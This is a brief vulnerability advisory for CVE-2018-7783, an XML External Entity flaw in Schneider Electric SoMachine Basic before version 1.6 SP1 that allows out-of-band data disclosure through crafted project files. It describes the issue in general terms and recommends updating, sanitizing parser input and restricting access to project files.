CVE-2018-7783

Name of the Vulnerable Software and Affected Versions: Schneider Electric SoMachine Basic versions prior to 1.6 SP1

Description: The issue is related to an XML External Entity (XXE) vulnerability, which uses the DTD parameter entities technique. This results in the disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project/template file.

Recommendations: For Schneider Electric SoMachine Basic versions prior to 1.6 SP1, update to version 1.6 SP1 or later to resolve the issue. As a temporary workaround, consider sanitizing the input passed to the xml parser to prevent exploitation. Restrict access to the xml project/template file to minimize the risk of arbitrary data disclosure.